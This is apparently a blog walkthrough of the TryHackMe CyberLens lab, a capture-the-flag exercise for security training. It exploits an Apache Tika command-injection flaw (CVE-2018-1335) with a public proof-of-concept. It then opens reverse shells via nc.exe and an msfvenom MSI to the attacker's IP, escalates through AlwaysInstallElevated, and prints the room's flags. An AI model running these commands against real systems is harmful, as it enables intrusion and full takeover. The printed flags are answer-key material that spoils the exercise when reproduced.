TryHackMe | CyberLens

In this walkthrough, I demonstrate how I obtained complete ownership of the CyberLens room on TryHackMe
TryHackMe | CyberLens
In: TryHackMe, Attack, CTF

Nmap Results

# Nmap 7.94SVN scan initiated Wed Jun 19 17:33:15 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.10.2.84
Nmap scan report for cyberlens.thm (10.10.2.84)
Host is up (0.075s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-06-18T21:30:11
|_Not valid after:  2024-12-18T21:30:11
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-06-19T21:34:46+00:00
|_ssl-date: 2024-06-19T21:34:54+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
|_http-title: Site doesn't have a title (text/plain).
|_http-cors: HEAD GET
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
| http-methods: 
|_  Potentially risky methods: PUT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-06-19T21:34:47
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 19 17:34:54 2024 -- 1 IP address (1 host up) scanned in 98.53 seconds





Service Enumeration

TCP/139,445

smbclient -N -L //cyberlens.thm

Check for anonymous SMB share access

No luck



TCP/80

Happy Path Testing

Walking the “happy path” · Pwning OWASP Juice Shop

Right now, we know nothing about the web site. We're just going to click through and inspect things to better understand what the web site does. We're just inputting expected values, nothing malicious. Again, just trying to understand the application.

Initial observations after interacting with the application:

  • The /contact.html page has a form that does nothing
  • The search bar does nothing
  • The /about.html page — CYBERLENS IMAGE EXTRACTOR — has an input field that takes any file and attempts to parse the file's metadata
    • It uses specific file parsers depending on the file's content type
    • When you submit the file, it makes a couple of HTTP requests to http://cyberlens.thm:61777/meta
      • HTTP OPTIONS request, the server responds with allowed methods
      • HTTP PUT request with the raw file contents as Content-Type: application/octet-stream, which is a raw byte stream to the server, after which the application reassembles the bytes and analyzes the file locally
Inspecting a .php file
Inspecting a .png file



Unhappy Path Testing

The interesting part of the application is the HTTP PUT call to http://cyberlens.thm:61777/meta. We should just be able to make requests directly to the server using curl.

Testing the File Upload

echo 'this is just a test' > /tmp/test.txt

Create a test file for use with curl

# -s : silent output
# -X : HTTP method
# -H 'Content-Type: application/octet-stream' : specify the sending content type
# -H 'Accept: application/json' : tell the application to return JSON
# -d '@/tmp/test.txt' : read the local file to send to the server

curl -s -X PUT -H 'Content-Type: application/octet-stream' \
-H 'Accept: application/json' -d '@/tmp/test.txt' \
http://cyberlens.thm:61777/meta | jq

Submit the file with curl and pipe to jq for formatting



Probing the Server for More Information

The Apache Tika 1.17 output is particularly interesting
Exploiting CVE-2018-1335: Command Injection in Apache Tika
A walk-through of steps taken to go from an undisclosed CVE for a command injection vulnerability in the Apache tika-server to a complete exploit.
This looks promising—if we put together all the information we have found so far we should technically be able to make some kind of HTTP request to the server, set a header that looks like “X-Tika-OCRTesseractPath: <some command>” and have this command be inserted into the cmd string and be executed. The only problem is is the “config.getTesseractPath()” is prepended to another string we cannot control, “getTesseractProg()” which ends up being a static string, “tesseract.exe”. To fix this we can wrap our command we want to execute in double quotes and Windows will ignore whatever is appended to it after the quotes, just executing our injected command.
  • Tika 1.17 is vulnerable to command injection via HTTP header X-Tika-OCRTesseractPath
  • The Java server does not sanitize inputs in this HTTP header, which defaults to tesseract.exe. However, as the author mentions, wrapping the payload in \"\" — escaped double quotes — causes Windows to parse the executable of our choosing
    • This works fine for executing single binaries, but we need a way to send process arguments along with the target binary
    • As the author points out, there are a few places we can control with specific inputs
💡
OCR is a technology for analyzing text data in image files, so we'll need to upload an image file in addition to using the OCR-specific HTTP headers. As the author notes, we can use Content-Type: image/jp2 to bypass checks for jpg magic bytes.

Effectively, cscript.exe becomes the OCR processing tool -- instead of tesseract.exe. And, the //E:Jscript is passed as an argument to cscript.exe, which tells cscript.exe to read the .tmp file as a VBScript or Jscript file.





Exploit

CVEs/CVE-2018-1335/CVE-2018-1335.py at master · RhinoSecurityLabs/CVEs
A collection of proof-of-concept exploit scripts written by the team at Rhino Security Labs for various CVEs. - RhinoSecurityLabs/CVEs

As linked in the research article

ℹ️
I tried for a good bit to use curl and PowerShell to mimick the exact payload being sent by the python script. I even sent the python request through Burp, as well as curl and PowerShell. And despite the requests being completely identical, it seems there is something magical about the python-requests module that curl and PowerShell cannot match.

Testing the Exploit

wget https://raw.githubusercontent.com/RhinoSecurityLabs/CVEs/master/CVE-2018-1335/CVE-2018-1335.py -O pwn.py
sudo tcpdump -ni tun0 icmp

Start tcpdump and listen for ICMP traffic

python3 pwn.py cyberlens.thm 61777 'ping 10.6.63.22'

Run the exploit and try and ping our VPN IP address

Perfect!



Reverse Shell

cp /usr/share/windows-resources/binaries/nc.exe .

Copy the nc.exe binary to the current directory

sudo impacket-smbserver -smb2support -username evil -password evil myshare .

Start an authenticated SMB server with a share name of myshare

python3 pwn.py cyberlens.thm 61777 'net use F: \\\\10.6.63.22\\myshare /user:evil "evil"'

Map the share to the F: volume on the target

sudo rlwrap nc -lnvp 443

Start a TCP listener on port 443

python3 pwn.py cyberlens.thm 61777 'F:\\nc.exe 10.6.63.22 443 -e powershell.exe'

Run nc.exe from Kali over the SMB channel and connect to the TCP listener

ℹ️
The issue is likely me being impatient, but I had to run the exploit a few times in succession before the connection would establish





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Host Name:                 CYBERLENS
OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          EC2
Registered Organization:   Amazon.com
Product ID:                00430-00000-00000-AA344
Original Install Date:     3/17/2021, 2:59:06 PM
System Boot Time:          6/19/2024, 9:29:24 PM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version:              Xen 4.11.amazon, 8/24/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Coordinated Universal Time
Total Physical Memory:     4,096 MB
Available Physical Memory: 2,941 MB
Virtual Memory: Max Size:  4,800 MB
Virtual Memory: Available: 3,329 MB
Virtual Memory: In Use:    1,471 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\CYBERLENS
Hotfix(s):                 27 Hotfix(s) Installed.
                           [01]: KB4601555
                           [02]: KB4470502
                           [03]: KB4470788
                           [04]: KB4480056
                           [05]: KB4486153
                           [06]: KB4493510
                           [07]: KB4499728
                           [08]: KB4504369
                           [09]: KB4512577
                           [10]: KB4512937
                           [11]: KB4521862
                           [12]: KB4523204
                           [13]: KB4535680
                           [14]: KB4539571
                           [15]: KB4549947
                           [16]: KB4558997
                           [17]: KB4562562
                           [18]: KB4566424
                           [19]: KB4570332
                           [20]: KB4577586
                           [21]: KB4577667
                           [22]: KB4587735
                           [23]: KB4589208
                           [24]: KB4598480
                           [25]: KB4601393
                           [26]: KB5000859
                           [27]: KB5001568
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.1
                                 IP address(es)
                                 [01]: 10.10.2.84
                                 [02]: fe80::c0dd:89a1:c4a5:7941    

Current User

User name                    CyberLens
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/6/2023 7:10:41 PM
Password expires             Never
Password changeable          6/6/2023 7:10:41 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   6/19/2024 9:30:26 PM

Logon hours allowed          All

Local Group Memberships      *Remote Desktop Users *Users                
Global Group memberships     *None
USER INFORMATION
----------------

User Name           SID                                         
=================== ============================================
cyberlens\cyberlens S-1-5-21-1966530601-3185510712-10604624-1008


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users           Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled    



Users and Groups

Local Users

User accounts for \\CYBERLENS

-------------------------------------------------------------------------------
Administrator            CyberLens                DefaultAccount           
Guest                    WDAGUtilityAccount    

Local Groups

Aliases for \\CYBERLENS

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users    



Network Configurations

Network Interfaces

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::c0dd:89a1:c4a5:7941%5
   IPv4 Address. . . . . . . . . . . : 10.10.2.84
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.10.0.1    



Processes and Services

Interesting Processes

Name        : java.exe
Owner       : CYBERLENS\CyberLens
CommandLine : "C:\Program Files\Eclipse Adoptium\jdk-17.0.7.7-hotspot\bin\java.exe" -cp 
              "C:\Apache-Tika\tika-server-1.17.jar;C:\Apache-Tika\jakarta.xml.bind-api-2.3.2.jar" 
              org.apache.tika.server.TikaServerCli --cors=* --host 0.0.0.0 --port=61777    



Interesting Files

C:\Users\CyberLens\Documents\Management\CyberLens-Management.txt

CyberLens
HackSmarter123    





Privilege Escalation

RDP as CyberLens

During the post-exploit enumeration phase, I was hunting around for interesting files and ran this PowerShell command, which revealed the file logged above:

cd ~
Get-ChildItem -Recurse -File -ErrorAction SilentlyContinue | Select-Object FullName

Command used to find the file with the username and password

xfreerdp /v:cyberlens.thm /u:CyberLens /p:HackSmarter123 /size:80% /drive:.,kali-share +clipboard

Enter Y to trust the RDP server certificate

PowerShell running in GUI on target



AlwaysInstallElevated

TryHackMe | Windows Privilege Escalation
In this post, I summarize lessons learned from two rooms covering Windows Privilege Escalation on TryHackMe

Going through my checklist of some quick wins...

AlwaysInstallElevated is enabled
You cannot install .msi files over the RDP session, due to the way the system security policies are configured, so we'll have to do this part back in our reverse shell
msfvenom -p windows/shell_reverse_tcp -f msi -o priv.msi LHOST=10.6.63.22 LPORT=443

Create a .msi file that will run a reverse shell connection back to Kali

I've still got my SMB share mapped to F:\, so copy the file locally
sudo rlwrap nc -lnvp 443

Start a TCP listener

cd ~/desktop
msiexec.exe /quiet /qn /i priv.msi

Run the .msi installer and connect back to Kali

We are NT Authority\SYSTEM



Flags

User

THM{T1k4-CV3-f0r-7h3-w1n}    

Root

THM{3lev@t3D-4-pr1v35c!}    
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.